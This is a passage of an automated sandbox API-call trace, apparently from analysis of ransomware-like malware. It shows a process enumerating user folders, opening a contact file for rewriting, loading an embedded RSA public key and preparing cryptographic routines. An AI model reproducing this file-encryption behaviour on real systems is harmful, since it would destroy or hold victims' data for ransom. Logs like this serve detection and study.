0x2e765d0 [0188.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.857] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Application Data\\") returned="Application Data\\" [0188.857] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.857] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0188.857] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.857] PathFindFileNameW (pszPath="") returned="" [0188.857] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Application Data\\*" (normalized: "c:\\users\\keecfmwgj\\application data\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98c239f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98c239f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0188.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccae48 | out: hHeap=0x620000) returned 1 [0188.859] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.860] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.860] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\") returned="Contacts\\" [0188.860] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.860] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b38 | out: hHeap=0x620000) returned 1 [0188.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.860] PathFindFileNameW (pszPath="") returned="" [0188.860] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.861] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.861] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0188.861] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact") returned=".contact" [0188.861] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0188.862] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=68382) returned 1 [0188.863] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0188.884] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.884] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.918] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.918] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0188.920] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0188.920] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.920] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.936] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0188.941] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0188.941] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.941] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0188.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85e28 [0188.941] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85e28, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85e28, pdwDataLen=0x312fa54) returned 1 [0188.983] GetLastError () returned 0x0 [0188.998] SetLastError (dwErrCode=0x0) [0189.030] GetLastError () returned 0x0 [0189.030] SetLastError (dwErrCode=0x0) [0189.030] GetLastError () returned 0x0 [0189.030] SetLastError (dwErrCode=0x0) [0189.067] GetLastError () returned 0x0 [0189.067] SetLastError (dwErrCode=0x0) [0189.067] GetLastError () returned 0x0 [0189.067] SetLastError (dwErrCode=0x0) [0189.067] GetLastError () returned 0x0 [0189.067] SetLastError (dwErrCode=0x0) [0189.067] GetLastError () returned 0x0 [0189.067] SetLastError (dwErrCode=0x0) [0189.067] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.068] GetLastError () returned 0x0 [0189.068] SetLastError (dwErrCode=0x0) [0189.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b38 [0189.069] GetLastError () returned 0x0 [0189.069] SetLastError (dwErrCode=0x0) [0189.069] GetLastError () returned 0x0 [0189.069] SetLastError (dwErrCode=0x0) [0189.069] GetLastError () returned 0x0 [0189.069] SetLastError (dwErrCode=0x0) [0189.069] GetLastError () returned 0x0 [0189.069] SetLastError (dwErrCode=0x0) [0189.069] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.070] SetLastError (dwErrCode=0x0) [0189.070] GetLastError () returned 0x0 [0189.071] SetLastError (dwErrCode=0x0) [0189.071] GetLastError () returned 0x0 [0189.071] SetLastError (dwErrCode=0x0) [0189.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0189.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b38 | out: hHeap=0x620000) returned 1 [0189.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85e28 | out: hHeap=0x620000) returned 1 [0189.071] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0189.071] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0189.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0189.085] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0189.088] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0189.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0189.088] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0189.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0189.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0189.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10b20) returned 0x2e96a68 [0189.090] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0189.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0189.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0189.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0189.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4790 [0189.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0189.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93420 [0189.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85e08 [0189.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93438 [0189.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93408 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c933c0 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85e28 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93390 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c933a8 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c933f0 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0189.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c933d8 [0189.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0189.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93468 [0189.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93480 [0189.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0189.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0189.330] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e935c8 [0189.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea7590 [0189.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0189.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93480 | out: hHeap=0x620000) returned 1 [0189.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93468 | out: hHeap=0x620000) returned 1 [0189.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0189.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7590 | out: hHeap=0x620000) returned 1 [0189.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93468 [0189.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0189.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93480 [0189.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85de8 [0189.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93450 [0189.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0189.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0189.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b38 [0189.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0189.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0189.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0189.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0189.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0189.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0189.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93480 | out: hHeap=0x620000) returned 1 [0189.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0189.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0189.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85de8 | out: hHeap=0x620000) returned 1 [0189.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0189.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93468 | out: hHeap=0x620000) returned 1 [0189.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b38 | out: hHeap=0x620000) returned 1 [0189.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0189.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e935c8 | out: hHeap=0x620000) returned 1 [0189.544] GetCurrentThreadId () returned 0x66c [0189.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x190) returned 0x678350 [0189.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb47f8 [0189.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0189.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93468 [0189.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e914a8 [0189.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64dcc0 [0189.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0189.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0189.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x66c990 [0189.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0189.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0189.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2c73318 [0189.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0189.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0189.688] GetCurrentThreadId () returned 0x66c [0189.689] GetVersionExA (in: lpVersionInformation=0x312f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x312f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x312f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0189.689] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76110000 [0189.689] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75cd0000 [0189.689] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x74580000 [0190.066] GetProcAddress (hModule=0x74580000, lpProcName="NetStatisticsGet") returned 0x7458644f [0190.066] GetProcAddress (hModule=0x74580000, lpProcName="NetApiBufferFree") returned 0x745b13d2 [0190.066] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x312f02c | out: Buffer=0x312f02c) returned 0x0 [0190.080] GetCurrentThreadId () returned 0x66c [0190.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.080] NetApiBufferFree (Buffer=0x2d0a238) returned 0x0 [0190.080] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x312f02c | out: Buffer=0x312f02c) returned 0x0 [0190.097] GetCurrentThreadId () returned 0x66c [0190.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.098] NetApiBufferFree (Buffer=0x2c3a610) returned 0x0 [0190.098] FreeLibrary (hLibModule=0x74580000) returned 1 [0190.101] GetProcAddress (hModule=0x76110000, lpProcName="CryptAcquireContextW") returned 0x7611df14 [0190.101] GetProcAddress (hModule=0x76110000, lpProcName="CryptGenRandom") returned 0x7611dfc8 [0190.102] GetProcAddress (hModule=0x76110000, 